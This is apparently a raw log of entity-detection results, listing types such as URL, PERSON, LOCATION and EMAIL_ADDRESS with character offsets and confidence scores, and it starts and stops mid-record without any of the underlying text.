0.5, type: URL, start: 1315, end: 1321, score: 0.5, type: URL, start: 1335, end: 1341, score: 0.5, type: URL, start: 1442, end: 1448, score: 0.5, type: URL, start: 1467, end: 1473, score: 0.5, type: URL, start: 1490, end: 1495, score: 0.5, type: URL, start: 1498, end: 1503, score: 0.5, type: URL, start: 1509, end: 1515, score: 0.5, type: URL, start: 1582, end: 1588, score: 0.5, type: URL, start: 1599, end: 1607, score: 0.5, type: URL, start: 1689, end: 1695, score: 0.5, type: EMAIL_ADDRESS, start: 2757, end: 2772, score: 1.0, type: NRP, start: 598, end: 611, score: 0.85, type: PERSON, start: 616, end: 641, score: 0.85, type: NRP, start: 1138, end: 1168, score: 0.85, type: LOCATION, start: 1523, end: 1551, score: 0.85, type: NRP, start: 2072, end: 2083, score: 0.85, type: LOCATION, start: 2551, end: 2562, score: 0.85, type: DATE_TIME, start: 3469, end: 3474, score: 0.85, type: DATE_TIME, start: 4858, end: 4873, score: 0.85, type: URL, start: 245, end: 252, score: 0.5, type: URL, start: 358, end: 365, score: 0.5, type: URL, start: 386, end: 393, score: 0.5, type: URL, start: 437, end: 444, score: 0.5, type: URL, start: 506, end: 513, score: 0.5, type: URL, start: 519, end: 527, score: 0.5, type: URL, start: 646, end: 653, score: 0.5, type: URL, start: 660, end: 668, score: 0.5, type: URL, start: 692, end: 699, score: 0.5, type: URL, start: 705, end: 713, score: 0.5, type: URL, start: 783, end: 797, score: 0.5, type: URL, start: 850, end: 857, score: 0.5, type: URL, start: 1000, end: 1007, score: 0.5, type: URL, start: 1368, end: 1375, score: 0.5, type: URL, start: 1448, end: 1455, score: 0.5, type: URL, start: 1523, end: 1535, score: 0.5, type: URL, start: 1624, end: 1631, score: 0.5, type: URL, start: 2162, end: 2167, score: 0.5, type: URL, start: 2232, end: 2237, score: 0.5, type: URL, start: 2298, end: 2308, score: 0.5, type: URL, start: 2390, end: 2395, score: 0.5, type: URL, start: 2507, end: 2516, score: 0.5, type: URL, start: 2763, end: 2772, score: 0.5, type: URL, start: 2789, end: 2794, score: 0.5, type: URL, start: 2888, end: 2892, score: 0.5, type: URL, start: 2921, end: 2925, score: 0.5, type: URL, start: 2950, end: 2954, score: 0.5, type: URL, start: 2977, end: 2981, score: 0.5, type: URL, start: 3007, end: 3011, score: 0.5, type: URL, start: 3038, end: 3042, score: 0.5, type: URL, start: 3066, end: 3070, score: 0.5, type: URL, start: 3327, end: 3331, score: 0.5, type: URL, start: 3374, end: 3394, score: 0.5, type: URL, start: 3422, end: 3426, score: 0.5, type: URL, start: 3609, end: 3616, score: 0.5, type: URL, start: 3783, end: 3790, score: 0.5, type: URL, start: 4382, end: 4392, score: 0.5, type: URL, start: 4395, end: 4402, score: 0.5, type: URL, start: 4639, end: 4646, score: 0.5, type: URL, start: 4828, end: 4835, score: 0.5, type: URL, start: 4846, end: 4853, score: 0.5, type: URL, start: 5356, end: 5363, score: 0.5, type: EMAIL_ADDRESS, start: 6445, end: 6460, score: 1.0, type: PERSON, start: 32, end: 42, score: 0.85, type: PERSON, start: 530, end: 539, score: 0.85, type: PERSON, start: 539, end: 547, score: 0.85, type: LOCATION, start: 608, end: 625, score: 0.85, type: PERSON, start: 1668, end: 1679, score: 0.85, type: PERSON, start: 3024, end: 3035, score: 0.85, type: LOCATION, start: 4233, end: 4244, score: 0.85, type: LOCATION, start: 5717, end: 5728, score: 0.85, type: DATE_TIME, start: 7021, end: 7031, score: 0.85, type: URL, start: 32, end: 42, score: 0.5, type: URL, start: 145, end: 160, score: 0.5, type: URL, start: 261, end: 273, score: 0.5, type: URL, start: 412, end: 418, score: 0.5, type: URL, start: 446, end: 452, score: 0.5, type: URL, start: 536, end: 541, score: 0.5, type: URL, start: 563, end: 577, score: 0.5, type: URL, start: 608, end: 617, score: 0.5, type: URL, start: 636, end: 642, score: 0.5, type: URL, start: 660, end: 666, score: 0.5, type: URL, start: 936, end: 942, score: 0.5, type: URL, start: 1049, end: 1055, score: 0.5, type: URL, start: 1636, end: 1651, score: 0.5, type: URL, start: 1668, end: 1675, score: 0.5, type: URL, start: 1687, end: 1697, score: 0.5, type: URL, start: 1702, end: 1710, score: 0.5, type: URL, start: 1795, end: 1807, score: 0.5, type: URL, start: 1862, end: 1870, score: 0.5, type: URL, start: 1935, end: 1957, score: 0.5, type: URL, start: 1982, end: 1997, score: 0.5, type: URL, start: 2048, end: 2063, score: 0.5, type: URL, start: 2081, end: 2089, score: 0.5, type: URL, start: 2095, end: 2110, score: 0.5, type: URL, start: 2122, end: 2136, score: 0.5, type: URL, start: 2166, end: 2173, score: 0.5, type: URL, start: 2213, end: 2225, score: 0.5, type: URL, start: 2304, end: 2312, score: 0.5, type: URL, start: 2345, end: 2357, score: 0.5, type: URL, start: 2364, end: 2372, score: 0.5, type: URL, start: 2518, end: 2530, score: 0.5, type: URL, start: 2570, end: 2582, score: 0.5, type: URL, start: 2607, end: 2614, score: 0.5, type: URL, start: 2986, end: 2993, score: 0.5, type: URL, start: 3024, end: 3031, score: 0.5, type: URL, start: 3127, end: 3139, score: 0.5, type: URL, start: 3339, end: 3351, score: 0.5, type: URL, start: 3537, end: 3549, score: 0.5, type: URL, start: 3681, end: 3693, score: 0.5, type: URL, start: 3724, end: 3731, score: 0.5, type: URL, start: 3761, end: 3773, score: 0.5, type: URL, start: 3814, end: 3826, score: 0.5, type: URL, start: 3942, end: 3948, score: 0.5, type: URL, start: 3972, end: 3985, score: 0.5, type: URL, start: 4058, end: 4066, score: 0.5, type: URL, start: 4185, end: 4191, score: 0.5, type: URL, start: 4211, end: 4225, score: 0.5, type: URL, start: 4233, end: 4239, score: 0.5, type: URL, start: 4250, end: 4264, score: 0.5, type: URL, start: 4315, end: 4328, score: 0.5, type: URL, start: 4330, end: 4336, score: 0.5, type: URL, start: 4448, end: 4464, score: 0.5, type: URL, start: 4582, end: 4592, score: 0.5, type: URL, start: 4655, end: 4661, score: 0.5, type: URL, start: 4687, end: 4693, score: 0.5, type: URL, start: 4738, end: 4744, score: 0.5, type: URL, start: 4746, end: 4757, score: 0.5, type: URL, start: 4819, end: 4833, score: 0.5, type: URL, start: 4836, end: 4843, score: 0.5, type: URL, start: 4852, end: 4860, score: 0.5, type: URL, start: 4918, end: 4934, score: 0.5, type: URL, start: 4996, end: 5006, score: 0.5, type: URL, start: 5045, end: 5051, score: 0.5, type: URL, start: 5053, end: 5064, score: 0.5, type: URL, start: 5118, end: 5132, score: 0.5, type: URL, start: 5135, end: 5142, score: 0.5, type: URL, start: 5151, end: 5159, score: 0.5, type: URL, start: 5272, end: 5282, score: 0.5, type: URL, start: 5321, end: 5331, score: 0.5, type: URL, start: 5333, end: 5344, score: 0.5, type: URL, start: 5413, end: 5427, score: 0.5, type: URL, start: 5430, end: 5437, score: 0.5, type: URL, start: 5446, end: 5454, score: 0.5, type: URL, start: 5549, end: 5563, score: 0.5, type: URL, start: 5566, end: 5573, score: 0.5, type: URL, start: 5585, end: 5599, score: 0.5, type: URL, start: 5665, end: 5681, score: 0.5, type: URL, start: 5717, end: 5723, score: 0.5, type: URL, start: 5891, end: 5905, score: 0.5, type: URL, start: 5965, end: 5979, score: 0.5, type: URL, start: 6003, end: 6013, score: 0.5, type: URL, start: 6048, end: 6062, score: 0.5, type: URL, start: 6086, end: 6100, score: 0.5, type: URL, start: 6122, end: 6148, score: 0.5, type: URL, start: 6416, end: 6426, score: 0.5, type: URL, start: 6451, end: 6460, score: 0.5, type: URL, start: 6552, end: 6562, score: 0.5, type: URL, start: 6713, end: 6724, score: 0.5, type: URL, start: 6739, end: 6746, score: 0.5, type: URL, start: 6780, end: 6787, score: 0.5, type: URL, start: 6802, end: 6809, score: 0.5, type: EMAIL_ADDRESS, start: 266, end: 281, score: 1.0, type: EMAIL_ADDRESS, start: 1658, end: 1673, score: 1.0, type: EMAIL_ADDRESS, start: 1676, end: 1691, score: 1.0, type: URL, start: 1449, end: 1493, score: 0.95, type: URL, start: 1547, end: 1592, score: 0.95, type: DATE_TIME, start: 95, end: 104, score: 0.85, type: PERSON, start: 252, end: 264, score: 0.85, type: DATE_TIME, start: 647, end: 660, score: 0.85, type: LOCATION, start: 1127, end: 1133, score: 0.85, type: LOCATION, start: 1149, end: 1152, score: 0.85, type: URL, start: 344, end: 373, score: 0.6, type: URL, start: 1387, end: 1432, score: 0.6, type: URL, start: 272, end: 281, score: 0.5, type: URL, start: 1664, end: 1673, score: 0.5, type: URL, start: 1682, end: 1691, score: 0.5, type: EMAIL_ADDRESS, start: 131, end: 146, score: 1.0, type: DATE_TIME, start: 185, end: 195, score: 0.85, type: DATE_TIME, start: 212, end: 222, score: 0.85, type: URL, start: 137, end: 146, score: 0.5, type: EMAIL_ADDRESS, start: 106, end: 121, score: 1.0, type: PERSON, start: 92, end: 105, score: 0.85, type: PERSON, start: 159, end: 164, score: 0.85, type: LOCATION, start: 569, end: 570, score: 0.85, type: LOCATION, start: 598, end: 599, score: 0.85, type: LOCATION, start: 1187, end: 1194, score: 0.85, type: PERSON, start: 1938, end: 1950, score: 0.85, type: PERSON, start: 4662, end: 4678, score: 0.85, type: PERSON, start: 8507, end: 8549, score: 0.85, type: PERSON, start: 8972, end: 8974, score: 0.85, type: URL, start: 112, end: 121, score: 0.5, type: URL, start: 353, end: 361, score: 0.5, type: URL, start: 378, end: 393, score: 0.5, type: URL, start: 1020, end: 1039, score: 0.5, type: URL, start: 1333, end: 1352, score: 0.5, type: URL, start: 1366, end: 1373, score: 0.5, type: URL, start: 2384, end: 2392, score: 0.5, type: URL, start: 2522, end: 2530, score: 0.5, type: URL, start: 2840, end: 2848, score: 0.5, type: URL, start: 3113, end: 3120, score: 0.5, type: URL, start: 3390, end: 3398, score: 0.5, type: URL, start: 3697, end: 3704, score: 0.5, type: URL, start: 3728, end: 3735, score: 0.5, type: URL, start: 3758, end: 3765, score: 0.5, type: URL, start: 4091, end: 4099, score: 0.5, type: URL, start: 4314, end: 4324, score: 0.5, type: URL, start: 4888, end: 4898, score: 0.5, type: URL, start: 4908, end: 4918, score: 0.5, type: URL, start: 5159, end: 5169, score: 0.5, type: URL, start: 5179, end: 5189, score: 0.5, type: URL, start: 5482, end: 5491, score: 0.5, type: URL, start: 5553, end: 5563, score: 0.5, type: URL, start: 5573, end: 5583, score: 0.5, type: URL, start: 5780, end: 5790, score: 0.5, type: URL, start: 6189, end: 6199, score: 0.5, type: URL, start: 6333, end: 6343, score: 0.5, type: URL, start: 6353, end: 6363, score: 0.5, type: URL, start: 6503, end: 6513, score: 0.5, type: URL, start: 6549, end: 6559, score: 0.5, type: URL, start: 6578, end: 6588, score: 0.5, type: URL, start: 6895, end: 6902, score: 0.5, type: URL, start: 6916, end: 6925, score: 0.5, type: URL, start: 7105, end: 7112, score: 0.5, type: URL, start: 7236, end: 7243, score: 0.5, type: URL, start: 7377, end: 7387, score: 0.5, type: URL, start: 7437, end: 7447, score: 0.5, type: URL, start: 7466, end: 7476, score: 0.5, type: URL, start: 7712, end: 7719, score: 0.5, type: URL, start: 7799, end: 7809, score: 0.5, type: URL, start: 7819, end: 7829, score: 0.5, type: URL, start: 9221, end: 9230, score: 0.5, type: EMAIL_ADDRESS, start: 263, end: 278, score: 1.0, type: EMAIL_ADDRESS, start: 349, end: 364, score: 1.0, type: EMAIL_ADDRESS, start: 637, end: 652, score: 1.0, type: PERSON, start: 88, end: 158, score: 0.85, type: PERSON, start: 250, end: 262, score: 0.85, type: PERSON, start: 336, end: 348, score: 0.85, type: PERSON, start: 624, end: 636, score: 0.85, type: DATE_TIME, start: 716, end: 726, score: 0.85, type: LOCATION, start: 2243, end: 2254, score: 0.85, type: PERSON, start: 2928, end: 2952, score: 0.85, type: PERSON, start: 2992, end: 2997, score: 0.85, type: PERSON, start: 5457, end: 5465, score: 0.85, type: PERSON, start: 6082, end: 6099, score: 0.85, type: URL, start: 269, end: 278, score: 0.5, type: URL, start: 355, end: 364, score: 0.5, type: URL, start: 643, end: 652, score: 0.5, type: URL, start: 705, end: 711, score: 0.5, type: URL, start: 1287, end: 1293, score: 0.5, type: URL, start: 1550, end: 1557, score: 0.5, type: URL, start: 1585, end: 1592, score: 0.5, type: URL, start: 1622, end: 1632, score: 0.5, type: URL, start: 1662, end: 1667, score: 0.5, type: URL, start: 1807, end: 1812, score: 0.5, type: URL, start: 1822, end: 1832, score: 0.5, type: URL, start: 1914, end: 1919, score: 0.5, type: URL, start: 2013, end: 2020, score: 0.5, type: URL, start: 2243, end: 2250, score: 0.5, type: URL, start: 2296, end: 2306, score: 0.5, type: URL, start: 2336, end: 2341, score: 0.5, type: URL, start: 2454, end: 2459, score: 0.5, type: URL, start: 2469, end: 2479, score: 0.5, type: URL, start: 2736, end: 2743, score: 0.5, type: URL, start: 2752, end: 2757, score: 0.5, type: URL, start: 2836, end: 2849, score: 0.5, type: URL, start: 2881, end: 2889, score: 0.5, type: URL, start: 3000, end: 3008, score: 0.5, type: URL, start: 3013, end: 3018, score: 0.5, type: URL, start: 3163, end: 3170, score: 0.5, type: URL, start: 3234, end: 3241, score: 0.5, type: URL, start: 3381, end: 3386, score: 0.5, type: URL, start: 3732, end: 3739, score: 0.5, type: URL, start: 3800, end: 3807, score: 0.5, type: URL, start: 3971, end: 3978, score: 0.5, type: URL, start: 4044, end: 4051, score: 0.5, type: URL, start: 4223, end: 4230, score: 0.5, type: URL, start: 4309, end: 4316, score: 0.5, type: URL, start: 4510, end: 4517, score: 0.5, type: URL, start: 4551, end: 4558, score: 0.5, type: URL, start: 4771, end: 4778, score: 0.5, type: URL, start: 4842, end: 4848, score: 0.5, type: URL, start: 4867, end: 4874, score: 0.5, type: URL, start: 5215, end: 5222, score: 0.5, type: URL, start: 5323, end: 5329, score: 0.5, type: URL, start: 5393, end: 5400, score: 0.5, type: URL, start: 5686, end: 5693, score: 0.5, type: URL, start: 5876, end: 5883, score: 0.5, type: URL, start: 6020, end: 6027, score: 0.5, type: URL, start: 6165, end: 6174, score: 0.5, type: URL, start: 6206, end: 6213, score: 0.5, type: URL, start: 6334, end: 6341, score: 0.5, type: URL, start: 6352, end: 6359, score: 0.5, type: URL, start: 6465, end: 6472, score: 0.5, type: URL, start: 6666, end: 6670, score: 0.5, type: URL, start: 6726, end: 6730, score: 0.5, type: URL, start: 6986, end: 6993, score: 0.5, type: URL, start: 7447, end: 7454, score: 0.5, type: URL, start: 7503, end: 7510, score: 0.5, type: URL, start: 7550, end: 7557, score: 0.5, type: URL, start: 7583, end: 7588, score: 0.5, type: URL, start: 7656, end: 7662, score: 0.5, type: URL, start: 7721, end: 7728, score: 0.5, type: URL, start: 7877, end: 7885, score: 0.5, type: URL, start: 7897, end: 7902, score: 0.5, type: URL, start: 7920, end: 7925, score: 0.5, type: URL, start: 7952, end: 7960, score: 0.5, type: URL, start: 7989, end: 7994, score: 0.5, type: URL, start: 8020, end: 8027, score: 0.5, type: URL, start: 8493, end: 8502, score: 0.5, type: URL, start: 8531, end: 8536, score: 0.5, type: URL, start: 8833, end: 8840, score: 0.5, type: URL, start: 9108, end: 9115, score: 0.5, type: URL, start: 9335, end: 9345, score: 0.5, type: URL, start: 9754, end: 9761, score: 0.5, type: URL, start: 9846, end: 9859, score: 0.5, type: URL, start: 131, end: 140, score: 0.85, type: LOCATION, start: 738, end: 746, score: 0.85, type: PERSON, start: 1869, end: 1898, score: 0.85, type: LOCATION, start: 2064, end: 2068, score: 0.85, type: LOCATION, start: 2337, end: 2341, score: 0.85, type: LOCATION, start: 2824, end: 2828, score: 0.85, type: LOCATION, start: 3076, end: 3080, score: 0.85, type: LOCATION, start: 3347, end: 3351, score: 0.85, type: LOCATION, start: 3626, end: 3630, score: 0.85, type: LOCATION, start: 3632, end: 3647, score: 0.85, type: LOCATION, start: 3897, end: 3901, score: 0.85, type: LOCATION, start: 4853, end: 4857, score: 0.85, type: LOCATION, start: 5224, end: 5228, score: 0.85, type: LOCATION, start: 5459, end: 5463, score: 0.85, type: PERSON, start: 5586, end: 5597, score: 0.85, type: PERSON, start: 5640, end: 5651, score: 0.85, type: LOCATION, start: 5860, end: 5864, score: 0.85, type: LOCATION, start: 6119, end: 6123, score: 0.85, type: LOCATION, start: 6611, end: 6615, score: 0.85, type: LOCATION, start: 7014, end: 7018, score: 0.85, type: LOCATION, start: 7616, end: 7629, score: 0.85, type: PERSON, start: 7807, end: 7819, score: 0.85, type: LOCATION, start: 9047, end: 9051, score: 0.85, type: PERSON, start: 9117, end: 9127, score: 0.85, type: LOCATION, start: 9581, end: 9585, score: 0.85, type: LOCATION, start: 12989, end: 12993, score: 0.85, type: LOCATION, start: 14233, end: 14237, score: 0.85, type: PERSON, start: 14425, end: 14442, score: 0.85, type: LOCATION, start: 14971, end: 14975, score: 0.85, type: PERSON, start: 15136, end: 15153, score: 0.85, type: LOCATION, start: 15695, end: 15699, score: 0.85, type: PERSON, start: 15710, end: 15717, score: 0.85, type: PERSON, start: 15935, end: 15941, score: 0.85, type: PERSON, start: 15944, end: 15998, score: 0.85, type: PERSON, start: 16738, end: 16746, score: 0.85, type: PERSON, start: 16811, end: 16818, score: 0.85, type: LOCATION, start: 17252, end: 17256, score: 0.85, type: LOCATION, start: 17498, end: 17502, score: 0.85, type: PERSON, start: 17515, end: 17519, score: 0.85, type: DATE_TIME, start: 18229, end: 18231, score: 0.85, type: DATE_TIME, start: 19283, end: 19285, score: 0.85, type: LOCATION, start: 19453, end: 19457, score: 0.85, type: NRP, start: 19468, end: 19474, score: 0.85, type: LOCATION, start: 19640, end: 19644, score: 0.85, type: NRP, start: 19655, end: 19661, score: 0.85, type: LOCATION, start: 19834, end: 19838, score: 0.85, type: LOCATION, start: 19999, end: 20003, score: 0.85, type: URL, start: 795, end: 877, score: 0.6, type: URL, start: 882, end: 964, score: 0.6, type: URL, start: 969, end: 1053, score: 0.6, type: URL, start: 3754, end: 3815, score: 0.6, type: URL, start: 4111, end: 4172, score: 0.6, type: URL, start: 4244, end: 4298, score: 0.6, type: URL, start: 417, end: 434, score: 0.5, type: URL, start: 631, end: 639, score: 0.5, type: URL, start: 1173, end: 1187, score: 0.5, type: URL, start: 1745, end: 1751, score: 0.5, type: URL, start: 1785, end: 1791, score: 0.5, type: URL, start: 2143, end: 2150, score: 0.5, type: URL, start: 2182, end: 2189, score: 0.5, type: URL, start: 2234, end: 2241, score: 0.5, type: URL, start: 2352, end: 2359, score: 0.5, type: URL, start: 2507, end: 2514, score: 0.5, type: URL, start: 2912, end: 2919, score: 0.5, type: URL, start: 2956, end: 2963, score: 0.5, type: URL, start: 2981, end: 2989, score: 0.5, type: URL, start: 3179, end: 3186, score: 0.5, type: URL, start: 3223, end: 3230, score: 0.5, type: URL, start: 3248, end: 3256, score: 0.5, type: URL, start: 3465, end: 3470, score: 0.5, type: URL, start: 3581, end: 3598, score: 0.5, type: URL, start: 3852, end: 3869, score: 0.5, type: URL, start: 4316, end: 4357, score: 0.5, type: URL, start: 4388, end: 4401, score: 0.5, type: URL, start: 4427, end: 4434, score: 0.5, type: URL, start: 4617, end: 4624, score: 0.5, type: URL, start: 4669, end: 4676, score: 0.5, type: URL, start: 4698, end: 4710, score: 0.5, type: URL, start: 4725, end: 4732, score: 0.5, type: URL, start: 4775, end: 4787, score: 0.5, type: URL, start: 4968, end: 4981, score: 0.5, type: URL, start: 5000, end: 5013, score: 0.5, type: URL, start: 5117, end: 5124, score: 0.5, type: URL, start: 5246, end: 5259, score: 0.5, type: URL, start: 5291, end: 5298, score: 0.5, type: URL, start: 5323, end: 5330, score: 0.5, type: URL, start: 5362, end: 5369, score: 0.5, type: URL, start: 5500, end: 5507, score: 0.5, type: URL, start: 5561, end: 5568, score: 0.5, type: URL, start: 5607, end: 5614, score: 0.5, type: URL, start: 5669, end: 5682, score: 0.5, type: URL, start: 5704, end: 5711, score: 0.5, type: URL, start: 5756, end: 5763, score: 0.5, type: URL, start: 5882, end: 5895, score: 0.5, type: URL, start: 5917, end: 5924, score: 0.5, type: URL, start: 5983, end: 5990, score: 0.5, type: URL, start: 6141, end: 6154, score: 0.5, type: URL, start: 6185, end: 6192, score: 0.5, type: URL, start: 6250, end: 6257, score: 0.5, type: URL, start: 6309, end: 6316, score: 0.5, type: URL, start: 6370, end: 6377, score: 0.5, type: URL, start: 6414, end: 6421, score: 0.5, type: URL, start: 6459, end: 6466, score: 0.5, type: URL, start: 6515, end: 6522, score: 0.5, type: URL, start: 6738, end: 6751, score: 0.5, type: URL, start: 6774, end: 6792, score: 0.5, type: URL, start: 6810, end: 6822, score: 0.5, type: URL, start: 6910, end: 6917, score: 0.5, type: URL, start: 7118, end: 7125, score: 0.5, type: URL, start: 7171, end: 7178, score: 0.5, type: URL, start: 7201, end: 7213, score: 0.5, type: URL, start: 7254, end: 7264, score: 0.5, type: URL, start: 7300, end: 7307, score: 0.5, type: URL, start: 7339, end: 7346, score: 0.5, type: URL, start: 7856, end: 7863, score: 0.5, type: URL, start: 7886, end: 7898, score: 0.5, type: URL, start: 7931, end: 7938, score: 0.5, type: URL, start: 7961, end: 7973, score: 0.5, type: URL, start: 8006, end: 8013, score: 0.5, type: URL, start: 8036, end: 8048, score: 0.5, type: URL, start: 8082, end: 8089, score: 0.5, type: URL, start: 8112, end: 8124, score: 0.5, type: URL, start: 8153, end: 8160, score: 0.5, type: URL, start: 8183, end: 8195, score: 0.5, type: URL, start: 8226, end: 8233, score: 0.5, type: URL, start: 8256, end: 8268, score: 0.5, type: URL, start: 8297, end: 8304, score: 0.5, type: URL, start: 8327, end: 8339, score: 0.5, type: URL, start: 8369, end: 8376, score: 0.5, type: URL, start: 8399, end: 8411, score: 0.5, type: URL, start: 8452, end: 8459, score: 0.5, type: URL, start: 8482, end: 8494, score: 0.5, type: URL, start: 8531, end: 8538, score: 0.5, type: URL, start: 8561, end: 8573, score: 0.5, type: URL, start: 8600, end: 8607, score: 0.5, type: URL, start: 8630, end: 8642, score: 0.5, type: URL, start: 8673, end: 8680, score: 0.5, type: URL, start: 8703, end: 8715, score: 0.5, type: URL, start: 8755, end: 8762, score: 0.5, type: URL, start: 8785, end: 8797, score: 0.5, type: URL, start: 8835, end: 8842, score: 0.5, type: URL, start: 8865, end: 8877, score: 0.5, type: URL, start: 8918, end: 8925, score: 0.5, type: URL, start: 8948, end: 8960, score: 0.5, type: URL, start: 9257, end: 9265, score: 0.5, type: URL, start: 9275, end: 9285, score: 0.5, type: URL, start: 9318, end: 9325, score: 0.5, type: URL, start: 9359, end: 9366, score: 0.5, type: URL, start: 9411, end: 9418, score: 0.5, type: URL, start: 9455, end: 9462, score: 0.5, type: URL, start: 9755, end: 9762, score: 0.5, type: URL, start: 9915, end: 9922, score: 0.5, type: URL, start: 10080, end: 10087, score: 0.5, type: URL, start: 10244, end: 10251, score: 0.5, type: URL, start: 10541, end: 10548, score: 0.5, type: URL, start: 10701, end: 10708, score: 0.5, type: URL, start: 10866, end: 10873, score: 0.5, type: URL, start: 11030, end: 11037, score: 0.5, type: URL, start: 11323, end: 11330, score: 0.5, type: URL, start: 11483, end: 11490, score: 0.5, type: URL, start: 11647, end: 11654, score: 0.5, type: URL, start: 11812, end: 11819, score: 0.5, type: URL, start: 12034, end: 12041, score: 0.5, type: URL, start: 12274, end: 12281, score: 0.5, type: URL, start: 12434, end: 12441, score: 0.5, type: URL, start: 12599, end: 12606, score: 0.5, type: URL, start: 12764, end: 12771, score: 0.5, type: URL, start: 13037, end: 13044, score: 0.5, type: URL, start: 13110, end: 13117, score: 0.5, type: URL, start: 13183, end: 13190, score: 0.5, type: URL, start: 13258, end: 13265, score: 0.5, type: URL, start: 13331, end: 13338, score: 0.5, type: URL, start: 13402, end: 13409, score: 0.5, type: URL, start: 13469, end: 13476, score: 0.5, type: URL, start: 13540, end: 13547, score: 0.5, type: URL, start: 13613, end: 13620, score: 0.5, type: URL, start: 13690, end: 13697, score: 0.5, type: URL, start: 13757, end: 13764, score: 0.5, type: URL, start: 13834, end: 13841, score: 0.5, type: URL, start: 13912, end: 13919, score: 0.5, type: URL, start: 13995, end: 14002, score: 0.5, type: URL, start: 14082, end: 14089, score: 0.5, type: URL, start: 14399, end: 14416, score: 0.5, type: URL, start: 14471, end: 14484, score: 0.5, type: URL, start: 14573, end: 14580, score: 0.5, type: URL, start: 14680, end: 14697, score: 0.5, type: URL, start: 14827, end: 14834, score: 0.5, type: URL, start: 15110, end: 15127, score: 0.5, type: URL, start: 15182, end: 15195, score: 0.5, type: URL, start: 15296, end: 15303, score: 0.5, type: URL, start: 15386, end: 15399, score: 0.5, type: URL, start: 15541, end: 15548, score: 0.5, type: URL, start: 15870, end: 15887, score: 0.5, type: URL, start: 15944, end: 15957, score: 0.5, type: URL, start: 16061, end: 16068, score: 0.5, type: URL, start: 16176, end: 16189, score: 0.5, type: URL, start: 16334, end: 16341, score: 0.5, type: URL, start: 16673, end: 16690, score: 0.5, type: URL, start: 16747, end: 16760, score: 0.5, type: URL, start: 16864, end: 16871, score: 0.5, type: URL, start: 16966, end: 16979, score: 0.5, type: URL, start: 17124, end: 17131, score: 0.5, type: URL, start: 17300, end: 17307, score: 0.5, type: URL, start: 17352, end: 17359, score: 0.5, type: URL, start: 17397, end: 17404, score: 0.5, type: URL, start: 17520, end: 17531, score: 0.5, type: URL, start: 17715, end: 17721, score: 0.5, type: URL, start: 17873, end: 17879, score: 0.5, type: URL, start: 17918, end: 17924, score: 0.5, type: URL, start: 18105, end: 18110, score: 0.5, type: URL, start: 18689, end: 18694, score: 0.5, type: URL, start: 18948, end: 18955, score: 0.5, type: URL, start: 18978, end: 18986, score: 0.5, type: URL, start: 19477, end: 19484, score: 0.5, type: URL, start: 19509, end: 19516, score: 0.5, type: URL, start: 19664, end: 19671, score: 0.5, type: URL, start: 19696, end: 19703, score: 0.5, type: URL, start: 19849, end: 19856, score: 0.5, type: URL, start: 19866, end: 19873, score: 0.5, type: URL, start: 20014, end: 20021, score: 0.5, type: URL, start: 20031, end: 20049, score: 0.5, type: EMAIL_ADDRESS, start: 99, end: 114, score: 1.0, type: DATE_TIME, start: 28, end: 55, score: 0.85, type: DATE_TIME, start: 57, end: 61, score: 0.85, type: PERSON, start: 794, end: 812, score: 0.85, type: PERSON, start: 835, end: 842, score: 0.85, type: PERSON, start: 1277, end: 1284, score: 0.85, type: PERSON, start: 1726, end: 1734, score: 0.85, type: NRP, start: 1824, end: 1830, score: 0.85, type: NRP, start: 1972, end: 1981, score: 0.85, type: LOCATION, start: 1994, end: 2014, score: 0.85, type: LOCATION, start: 2057, end: 2063, score: 0.85, type: PERSON, start: 2182, end: 2207, score: 0.85, type: NRP, start: 2370, end: 2382, score: 0.85, type: PERSON, start: 2459, end: 2480, score: 0.85, type: NRP, start: 2600, end: 2606, score: 0.85, type: URL, start: 77, end: 98, score: 0.6, type: URL, start: 756, end: 784, score: 0.6, type: URL, start: 105, end: 114, score: 0.5, type: URL, start: 867, end: 875, score: 0.5, type: URL, start: 905, end: 916, score: 0.5, type: URL, start: 941, end: 956, score: 0.5, type: URL, start: 1005, end: 1024, score: 0.5, type: URL, start: 1074, end: 1093, score: 0.5, type: URL, start: 1139, end: 1153, score: 0.5, type: URL, start: 1571, end: 1595, score: 0.5, type: URL, start: 1631, end: 1638, score: 0.5, type: URL, start: 1645, end: 1662, score: 0.5, type: URL, start: 1834, end: 1859, score: 0.5, type: URL, start: 1895, end: 1903, score: 0.5, type: URL, start: 1909, end: 1916, score: 0.5, type: URL, start: 2370, end: 2377, score: 0.5, type: URL, start: 2610, end: 2635, score: 0.5, type: URL, start: 2774, end: 2782, score: 0.5, type: URL, start: 2788, end: 2795, score: 0.5, type: EMAIL_ADDRESS, start: 130, end: 145, score: 1.0, type: EMAIL_ADDRESS, start: 178, end: 193, score: 1.0, type: PERSON, start: 117, end: 129, score: 0.85, type: PERSON, start: 164, end: 177, score: 0.85, type: IP_ADDRESS, start: 116, end: 117, score: 0.6, type: IP_ADDRESS, start: 161, end: 164, score: 0.6, type: URL, start: 136, end: 145, score: 0.5, type: URL, start: 184, end: 193, score: 0.5, type: URL, start: 605, end: 612, score: 0.5, type: URL, start: 648, end: 655, score: 0.5, type: URL, start: 967, end: 974, score: 0.5, type: URL, start: 1003, end: 1010, score: 0.5, type: URL, start: 1055, end: 1062, score: 0.5, type: EMAIL_ADDRESS, start: 13718, end: 13733, score: 1.0, type: LOCATION, start: 25, end: 26, score: 0.85, type: LOCATION, start: 28, end: 29, score: 0.85, type: NRP, start: 54, end: 60, score: 0.85, type: DATE_TIME, start: 78, end: 89, score: 0.85, type: LOCATION, start: 390, end: 391, score: 0.85, type: LOCATION, start: 633, end: 634, score: 0.85, type: NRP, start: 1347, end: 1377, score: 0.85, type: LOCATION, start: 1839, end: 1864, score: 0.85, type: PERSON, start: 2540, end: 2554, score: 0.85, type: PERSON, start: 2671, end: 2676, score: 0.85, type: PERSON, start: 3055, end: 3086, score: 0.85, type: PERSON, start: 3957, end: 3971, score: 0.85, type: PERSON, start: 4059, end: 4064, score: 0.85, type: PERSON, start: 4450, end: 4481, score: 0.85, type: PERSON, start: 5044, end: 5058, score: 0.85, type: PERSON, start: 5160, end: 5165, score: 0.85, type: PERSON, start: 5350, end: 5366, score: 0.85, type: PERSON, start: 5982, end: 5998, score: 0.85, type: DATE_TIME, start: 6375, end: 6388, score: 0.85, type: PERSON, start: 6549, end: 6566, score: 0.85, type: PERSON, start: 8247, end: 8252, score: 0.85, type: PERSON, start: 8561, end: 8581, score: 0.85, type: PERSON, start: 8988, end: 9004, score: 0.85, type: PERSON, start: 9295, end: 9308, score: 0.85, type: PERSON, start: 10334, end: 10340, score: 0.85, type: PERSON, start: 10629, end: 10680, score: 0.85, type: PERSON, start: 10967, end: 10980, score: 0.85, type: NRP, start: 11126, end: 11135, score: 